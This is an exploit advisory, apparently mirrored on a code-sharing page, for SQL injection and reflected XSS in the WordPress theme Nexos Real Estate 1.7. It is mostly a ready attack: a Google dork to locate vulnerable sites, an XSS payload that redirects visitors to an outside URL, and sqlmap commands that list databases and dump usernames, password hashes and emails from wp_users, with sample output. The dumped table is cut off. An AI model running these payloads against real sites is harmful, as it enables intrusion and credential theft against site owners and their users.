扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 |
# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection # Google Dork: inurl:/wp-content/themes/nexos/ # Date: 2020-06-17 # Exploit Author: Vlad Vector # Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] # Software Version: 1.7 # Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 # Tested on: Debian 10 # CVE: CVE-2020-15363, CVE-2020-15364 # CWE: CWE-79, CWE-89 ### [ Info: ] [i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(<code>VLΛDVΞCTOR</code>);window.location=<code>https://twitter.com/vlad_vector</code>%3E> [!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(<code>VL%CE%9BDV%CE%9ECTOR</code>);window.location=<code>https://twitter.com/vlad_vector</code>%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: TARGET-DB Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+ |
体验盒子
